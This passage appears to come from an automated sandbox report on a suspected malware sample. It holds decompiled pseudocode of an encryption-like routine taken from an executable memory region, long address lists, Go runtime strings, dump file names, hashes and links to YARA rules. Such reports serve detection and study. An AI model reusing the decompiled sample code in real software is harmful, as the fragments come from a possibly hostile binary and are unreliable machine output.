				_t1165 = _v68;
				 *(_t1165 + _t1067 * 0xe * 0xf) =  *(_v68 + _t933 * 7) ^  *(_v68 + _t1067 * 0xe);
				_v68 = _v68 + 0x20;
				goto 0xf8a86a62;
				goto 0xf8a86c9b;
				goto 0xf8a87048;
				_v68 = _a20 + 0xf0;
				_v60 = _a20 + _v80 * 4 - 0x10;
				 *_v68 =  *_v60;
				_v68 = _v68 + 4;
				_v60 = _v60 + 4;
				 *_v68 =  *_v60;
				_v68 = _v68 + 4;
				_v60 = _v60 + 4;
				 *_v68 =  *_v60;
				_v68 = _v68 + 4;
				_v60 = _v60 + 4;
				 *_v68 =  *_v60;
				_v68 = _v68 - 0xc;
				_v60 = _v60 - 0xc;
				_v84 = 1;
				_v84 = _v84 + 1;
				if (_v84 -  *((intOrPtr*)(_a20 + 0x1e0)) >= 0) goto 0xf8a86f9e;
				_v60 = _v60 - 0x10;
				_t965 = _v68 + 0x10;
				_v68 = _t965;
				_t966 = _t965 * 0;
				_v76 =  *((intOrPtr*)(_v60 + _t966));
				_t1168 = _v68;
				 *_t1168 =  *(0xf8a957a0 + _t966 * 4) ^  *(0xf8a95ba0 + _t1165 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
				_t967 = _t966;
				_v76 =  *((intOrPtr*)(_v60 + _t967));
				_t1171 = _v68;
				 *(_t1171 + 0x25bf8a957a0) =  *(0xf8a957a0 + _t967 * 4) ^  *(0xf8a95ba0 + _t1168 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
				_t968 = _t967 * 2;
				_v76 =  *((intOrPtr*)(_v60 + _t968));
				_t1174 = _v68;
				 *(_t1174 + 0x4b7f152af40) =  *(0xf8a957a0 + _t968 * 4) ^  *(0xf8a95ba0 + _t1171 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
				_t969 = _t968 * 3;
				_v76 =  *((intOrPtr*)(_v60 + _t969));
				_t1165 = _v68;
				 *(_v68 + 0x713e9fc06e0) =  *(0xf8a957a0 + _t969 * 4) ^  *(0xf8a95ba0 + _t1174 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
				goto L1;
				_v60 = _v60 - 0x10;
				_v60 = _v60 - 0x10;
				_v68 = _v68 + 0x10;
				_v68 = _v68 + 0x10;
				__rax = _v68;
				__rcx = _v60;
				__ecx =  *_v60;
				 *_v68 =  *_v60;
				_v68 = _v68 + 4;
				_v68 = _v68 + 4;
				_v60 = _v60 + 4;
				_v60 = _v60 + 4;
				__rax = _v68;
				__rcx = _v60;
				__ecx =  *_v60;
				 *_v68 =  *_v60;
				_v68 = _v68 + 4;
				_v68 = _v68 + 4;
				_v60 = _v60 + 4;
				_v60 = _v60 + 4;
				__rax = _v68;
				__rcx = _v60;
				__ecx =  *_v60;
				 *_v68 =  *_v60;
				_v68 = _v68 + 4;
				_v68 = _v68 + 4;
				_v60 = _v60 + 4;
				_v60 = _v60 + 4;
				__rax = _v68;
				__rcx = _v60;
				__ecx =  *_v60;
				 *_v68 =  *_v60;
				__rsp = __rsp + 0x60;
				return 0;
			}







































































































                                                                                                                            0x25bf8a86190
                                                                                                                            0x25bf8a86195
                                                                                                                            0x25bf8a8619a
                                                                                                                            0x25bf8a8619e
                                                                                                                            0x25bf8a861b5
                                                                                                                            0x25bf8a861c1
                                                                                                                            0x25bf8a861c8
                                                                                                                            0x25bf8a861cf
                                                                                                                            0x25bf8a861d6
                                                                                                                            0x25bf8a861e3
                                                                                                                            0x25bf8a861e9
                                                                                                                            0x25bf8a861fd
                                                                                                                            0x25bf8a86204
                                                                                                                            0x25bf8a8620d
                                                                                                                            0x25bf8a86222
                                                                                                                            0x25bf8a86228
                                                                                                                            0x25bf8a86230
                                                                                                                            0x25bf8a86238
                                                                                                                            0x25bf8a86242
                                                                                                                            0x25bf8a86246
                                                                                                                            0x25bf8a8625c
                                                                                                                            0x25bf8a862b9
                                                                                                                            0x25bf8a862c1
                                                                                                                            0x25bf8a862c5
                                                                                                                            0x25bf8a862dc
                                                                                                                            0x25bf8a8633c
                                                                                                                            0x25bf8a86344
                                                                                                                            0x25bf8a86348
                                                                                                                            0x25bf8a8635f
                                                                                                                            0x25bf8a863bf
                                                                                                                            0x25bf8a863c7
                                                                                                                            0x25bf8a863cb
                                                                                                                            0x25bf8a863e2
                                                                                                                            0x25bf8a86442
                                                                                                                            0x25bf8a8644a
                                                                                                                            0x25bf8a86450
                                                                                                                            0x25bf8a8645d
                                                                                                                            0x25bf8a86469
                                                                                                                            0x25bf8a86472
                                                                                                                            0x25bf8a86476
                                                                                                                            0x25bf8a8647f
                                                                                                                            0x25bf8a86495
                                                                                                                            0x25bf8a864a9
                                                                                                                            0x25bf8a864b2
                                                                                                                            0x25bf8a864ba
                                                                                                                            0x25bf8a864c3
                                                                                                                            0x25bf8a864df
                                                                                                                            0x25bf8a864e8
                                                                                                                            0x25bf8a864f0
                                                                                                                            0x25bf8a864f9
                                                                                                                            0x25bf8a86515
                                                                                                                            0x25bf8a8651e
                                                                                                                            0x25bf8a86554
                                                                                                                            0x25bf8a8655d
                                                                                                                            0x25bf8a86566
                                                                                                                            0x25bf8a86568
                                                                                                                            0x25bf8a8656f
                                                                                                                            0x25bf8a86573
                                                                                                                            0x25bf8a86578
                                                                                                                            0x25bf8a8657d
                                                                                                                            0x25bf8a86587
                                                                                                                            0x25bf8a8658d
                                                                                                                            0x25bf8a8659a
                                                                                                                            0x25bf8a8659e
                                                                                                                            0x25bf8a865b5
                                                                                                                            0x25bf8a86615
                                                                                                                            0x25bf8a86621
                                                                                                                            0x25bf8a86638
                                                                                                                            0x25bf8a86698
                                                                                                                            0x25bf8a866ae
                                                                                                                            0x25bf8a866be
                                                                                                                            0x25bf8a866c7
                                                                                                                            0x25bf8a866cb
                                                                                                                            0x25bf8a866d4
                                                                                                                            0x25bf8a866ea
                                                                                                                            0x25bf8a866fe
                                                                                                                            0x25bf8a86707
                                                                                                                            0x25bf8a8670f
                                                                                                                            0x25bf8a86718
                                                                                                                            0x25bf8a86734
                                                                                                                            0x25bf8a8673d
                                                                                                                            0x25bf8a86745
                                                                                                                            0x25bf8a8674e
                                                                                                                            0x25bf8a8676a
                                                                                                                            0x25bf8a86773
                                                                                                                            0x25bf8a8677b
                                                                                                                            0x25bf8a86784
                                                                                                                            0x25bf8a867a0
                                                                                                                            0x25bf8a867a9
                                                                                                                            0x25bf8a867b2
                                                                                                                            0x25bf8a867bb
                                                                                                                            0x25bf8a867bd
                                                                                                                            0x25bf8a867c4
                                                                                                                            0x25bf8a867cd
                                                                                                                            0x25bf8a867e9
                                                                                                                            0x25bf8a867f2
                                                                                                                            0x25bf8a86828
                                                                                                                            0x25bf8a86830
                                                                                                                            0x25bf8a86834
                                                                                                                            0x25bf8a86839
                                                                                                                            0x25bf8a8683e
                                                                                                                            0x25bf8a86848
                                                                                                                            0x25bf8a8684e
                                                                                                                            0x25bf8a8685b
                                                                                                                            0x25bf8a8685f
                                                                                                                            0x25bf8a86876
                                                                                                                            0x25bf8a868d6
                                                                                                                            0x25bf8a868de
                                                                                                                            0x25bf8a868e2
                                                                                                                            0x25bf8a868f9
                                                                                                                            0x25bf8a86959
                                                                                                                            0x25bf8a86961
                                                                                                                            0x25bf8a86965
                                                                                                                            0x25bf8a8697c
                                                                                                                            0x25bf8a869dc
                                                                                                                            0x25bf8a869e8
                                                                                                                            0x25bf8a869ff
                                                                                                                            0x25bf8a86a5f
                                                                                                                            0x25bf8a86a75
                                                                                                                            0x25bf8a86a85
                                                                                                                            0x25bf8a86a8e
                                                                                                                            0x25bf8a86a92
                                                                                                                            0x25bf8a86a9b
                                                                                                                            0x25bf8a86ab1
                                                                                                                            0x25bf8a86ac5
                                                                                                                            0x25bf8a86ace
                                                                                                                            0x25bf8a86ad6
                                                                                                                            0x25bf8a86adf
                                                                                                                            0x25bf8a86afb
                                                                                                                            0x25bf8a86b04
                                                                                                                            0x25bf8a86b0c
                                                                                                                            0x25bf8a86b15
                                                                                                                            0x25bf8a86b31
                                                                                                                            0x25bf8a86b3a
                                                                                                                            0x25bf8a86b42
                                                                                                                            0x25bf8a86b70
                                                                                                                            0x25bf8a86b79
                                                                                                                            0x25bf8a86b82
                                                                                                                            0x25bf8a86b84
                                                                                                                            0x25bf8a86b8e
                                                                                                                            0x25bf8a86b9a
                                                                                                                            0x25bf8a86ba3
                                                                                                                            0x25bf8a86ba7
                                                                                                                            0x25bf8a86bb0
                                                                                                                            0x25bf8a86bb3
                                                                                                                            0x25bf8a86bb8
                                                                                                                            0x25bf8a86bce
                                                                                                                            0x25bf8a86bd7
                                                                                                                            0x25bf8a86bdf
                                                                                                                            0x25bf8a86be8
                                                                                                                            0x25bf8a86c04
                                                                                                                            0x25bf8a86c0d
                                                                                                                            0x25bf8a86c15
                                                                                                                            0x25bf8a86c1e
                                                                                                                            0x25bf8a86c3a
                                                                                                                            0x25bf8a86c43
                                                                                                                            0x25bf8a86c74
                                                                                                                            0x25bf8a86c79
                                                                                                                            0x25bf8a86c85
                                                                                                                            0x25bf8a86c8a
                                                                                                                            0x25bf8a86c8f
                                                                                                                            0x25bf8a86c96
                                                                                                                            0x25bf8a86ca9
                                                                                                                            0x25bf8a86cc0
                                                                                                                            0x25bf8a86cd1
                                                                                                                            0x25bf8a86cdc
                                                                                                                            0x25bf8a86cea
                                                                                                                            0x25bf8a86cfb
                                                                                                                            0x25bf8a86d06
                                                                                                                            0x25bf8a86d14
                                                                                                                            0x25bf8a86d25
                                                                                                                            0x25bf8a86d30
                                                                                                                            0x25bf8a86d3e
                                                                                                                            0x25bf8a86d4f
                                                                                                                            0x25bf8a86d5a
                                                                                                                            0x25bf8a86d68
                                                                                                                            0x25bf8a86d6d
                                                                                                                            0x25bf8a86d7d
                                                                                                                            0x25bf8a86d93
                                                                                                                            0x25bf8a86da2
                                                                                                                            0x25bf8a86dac
                                                                                                                            0x25bf8a86db0
                                                                                                                            0x25bf8a86dba
                                                                                                                            0x25bf8a86dc6
                                                                                                                            0x25bf8a86e26
                                                                                                                            0x25bf8a86e2b
                                                                                                                            0x25bf8a86e33
                                                                                                                            0x25bf8a86e3f
                                                                                                                            0x25bf8a86e9f
                                                                                                                            0x25bf8a86ea4
                                                                                                                            0x25bf8a86eac
                                                                                                                            0x25bf8a86eb8
                                                                                                                            0x25bf8a86f18
                                                                                                                            0x25bf8a86f1d
                                                                                                                            0x25bf8a86f25
                                                                                                                            0x25bf8a86f31
                                                                                                                            0x25bf8a86f91
                                                                                                                            0x25bf8a86f96
                                                                                                                            0x25bf8a86f99
                                                                                                                            0x25bf8a86fa3
                                                                                                                            0x25bf8a86fa7
                                                                                                                            0x25bf8a86fb1
                                                                                                                            0x25bf8a86fb5
                                                                                                                            0x25bf8a86fba
                                                                                                                            0x25bf8a86fbf
                                                                                                                            0x25bf8a86fc4
                                                                                                                            0x25bf8a86fc6
                                                                                                                            0x25bf8a86fcd
                                                                                                                            0x25bf8a86fd1
                                                                                                                            0x25bf8a86fdb
                                                                                                                            0x25bf8a86fdf
                                                                                                                            0x25bf8a86fe4
                                                                                                                            0x25bf8a86fe9
                                                                                                                            0x25bf8a86fee
                                                                                                                            0x25bf8a86ff0
                                                                                                                            0x25bf8a86ff7
                                                                                                                            0x25bf8a86ffb
                                                                                                                            0x25bf8a87005
                                                                                                                            0x25bf8a87009
                                                                                                                            0x25bf8a8700e
                                                                                                                            0x25bf8a87013
                                                                                                                            0x25bf8a87018
                                                                                                                            0x25bf8a8701a
                                                                                                                            0x25bf8a87021
                                                                                                                            0x25bf8a87025
                                                                                                                            0x25bf8a8702f
                                                                                                                            0x25bf8a87033
                                                                                                                            0x25bf8a87038
                                                                                                                            0x25bf8a8703d
                                                                                                                            0x25bf8a87042
                                                                                                                            0x25bf8a87044
                                                                                                                            0x25bf8a87048
                                                                                                                            0x25bf8a8704d

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $<$Changing the code in this way will not affect the quality of the resulting optimized code.
                                                                                                                            • API String ID: 0-1227851518
                                                                                                                            • Opcode ID: b87a5cde6e5a4077ad07fe7312a0047c8e78c2eb291cf124416320b341590277
                                                                                                                            • Instruction ID: 5fef58ab8b620c7275eb01b683d71b9c6ce5da88d29564f7a6e82e64ff632a0f
                                                                                                                            • Opcode Fuzzy Hash: b87a5cde6e5a4077ad07fe7312a0047c8e78c2eb291cf124416320b341590277
                                                                                                                            • Instruction Fuzzy Hash: 5092E1B2329A8087DB58CB1DE4A573AB7A1F3C8B84F54512AF79B87794CA3CC451CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01303EA0 Relevance: 4.1, Strings: 3, Instructions: 378COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: cap out of rangeinternal lockOSThread errorinvalid profile b, xrefs: 01304486
                                                                                                                            • chansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressoperation now in progressreleasep: invalid p stateremaining , xrefs: 01304462
                                                                                                                            • unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->sta, xrefs: 01303FA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: cap out of rangeinternal lockOSThread errorinvalid profile b$chansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkmissing stack in newstackmissing traceGCSweepStartno buffer space availableno such device or addressoperation now in progressreleasep: invalid p stateremaining $unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->sta
                                                                                                                            • API String ID: 0-1882019176
                                                                                                                            • Opcode ID: 795441b1299711dbf14235fdac2fdff8bd957df93b37b3807bdbf86b755ed247
                                                                                                                            • Instruction ID: 60d9bb1a3508004e81eec5034edd4f7bda3620dc8d50fc98c71639a3aa4f1f8a
                                                                                                                            • Opcode Fuzzy Hash: 795441b1299711dbf14235fdac2fdff8bd957df93b37b3807bdbf86b755ed247
                                                                                                                            • Instruction Fuzzy Hash: 55F1DE72204B84C6D751DB2AE45039ABBA5F395BE8F549225CF9C57BE9CF38C188C740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0132E600 Relevance: 4.0, Strings: 3, Instructions: 254COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject unexpected; result=runtime: waitforsingleobject wait_failed; errno=slice bounds out of range [:%x] with capacity %ycasgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on , xrefs: 0132EA6E
                                                                                                                            • runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint overflows a 64-bit integergcSweep being done, xrefs: 0132EA93
                                                                                                                            • self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.n, xrefs: 0132EAA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject unexpected; result=runtime: waitforsingleobject wait_failed; errno=slice bounds out of range [:%x] with capacity %ycasgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on $runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint overflows a 64-bit integergcSweep being done$self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.n
                                                                                                                            • API String ID: 0-4222696518
                                                                                                                            • Opcode ID: 9e6dd5e231a23a3957b388778db7320557d9b485e376df7a2c0f83d87a2d1558
                                                                                                                            • Instruction ID: 9013819d2faca232429a8229ee7cbd8aa88b5ea3c33a6f82cf064d0b766e7664
                                                                                                                            • Opcode Fuzzy Hash: 9e6dd5e231a23a3957b388778db7320557d9b485e376df7a2c0f83d87a2d1558
                                                                                                                            • Instruction Fuzzy Hash: F7C16036605F9081D765DF29E4913AAB764F789BA8F449236DF9C877A5CF38C081CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01304BE0 Relevance: 2.9, Strings: 2, Instructions: 413COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: cap out of rangeinternal lockOSThread errorinvalid profile b, xrefs: 0130526A
                                                                                                                            • unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->sta, xrefs: 01304D86
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: G waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not waiting for gcgrowslice: cap out of rangeinternal lockOSThread errorinvalid profile b$unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>) p->sta
                                                                                                                            • API String ID: 0-4218621180
                                                                                                                            • Opcode ID: decc5d0ee1d1fda7a2b4d6393fc50350538b18f5c8554ba30501523ba231b98e
                                                                                                                            • Instruction ID: 0772e1aef6eba969fb9efe242d27266e6f260e4ea9a5fe730979e3493c234e1a
                                                                                                                            • Opcode Fuzzy Hash: decc5d0ee1d1fda7a2b4d6393fc50350538b18f5c8554ba30501523ba231b98e
                                                                                                                            • Instruction Fuzzy Hash: B602DE72204B84C6DB61DB2AE45039AB7A5F799FC8F589025CF8C47BA9CF39C589C740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01322240 Relevance: 1.6, Strings: 1, Instructions: 379COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • grew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemultiple Read calls return no data or errornon in-use span found with specials bit setro, xrefs: 0132284C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: grew heap, but no adequate free space foundheapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemultiple Read calls return no data or errornon in-use span found with specials bit setro
                                                                                                                            • API String ID: 0-2241047259
                                                                                                                            • Opcode ID: 494e14c4a39be88f35f18bd47da632fba93b99b8b11610fd0c15cf0a9b84ea5e
                                                                                                                            • Instruction ID: 51398b8b68c15845f67ea855276f4a2f3605b133e3b9c4a9adf15d82657adba5
                                                                                                                            • Opcode Fuzzy Hash: 494e14c4a39be88f35f18bd47da632fba93b99b8b11610fd0c15cf0a9b84ea5e
                                                                                                                            • Instruction Fuzzy Hash: D5F16F72209B9482DB219B19E48039BBBA1F799BD8F585126DFCD47B29DF3CC490CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0131C9C0 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • released less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base poin, xrefs: 0131CDCB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
